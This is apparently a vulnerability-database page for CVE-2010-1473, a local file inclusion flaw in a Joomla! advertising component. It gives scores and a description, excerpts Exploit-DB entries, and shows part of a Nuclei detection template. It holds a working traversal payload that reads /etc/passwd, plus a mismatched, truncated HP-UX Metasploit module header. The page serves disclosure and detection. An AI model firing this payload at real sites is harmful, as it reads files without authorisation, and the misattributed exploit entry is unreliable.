CVE-2010-1473
Published: 2010-04-19
Priority: P3 42 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 8.16% (94.2th percentile)
Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| johnmccollum | com_advertising | — | — |
No detection rules found.
Exploit-DB
CVE-2002-1473 HP-UX LPD - Command Execution (Metasploit)
exploitdb · 2010-10-06
---
##
# $Id: cleanup_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP-UX LPD Command Execution',
'Description' => %q{
This exploit abuses an unpublished vulnerability in the
HP-UX LPD service. This flaw allows an unauthenticated
attacker to execute arbitrary commands with the privileges
of the root user. The LPD service is only exploitable when
the address of the attacking system can be resolved by the
target. This vulnerability was silently patched wit
Exploit-DB
CVE-2010-1473 Joomla! Component Advertising 0.25 - Local File Inclusion
exploitdb · 2010-04-12
---
[o] Joomla Component Easy Ad Banner Local File Inclusion Vulnerability
Software : com_advertising version 0.25
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_advertising&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
[o] April 12 2010 - GMT +07:00 Jakarta, Indonesia
Nuclei
CVE-2010-1473 [MEDIUM] Joomla! Component Advertising 0.25 - Local File Inclusion
nuclei · CVSS 6.8
A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1473
info:
  name: Joomla! Component Advertising 0.25 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized acces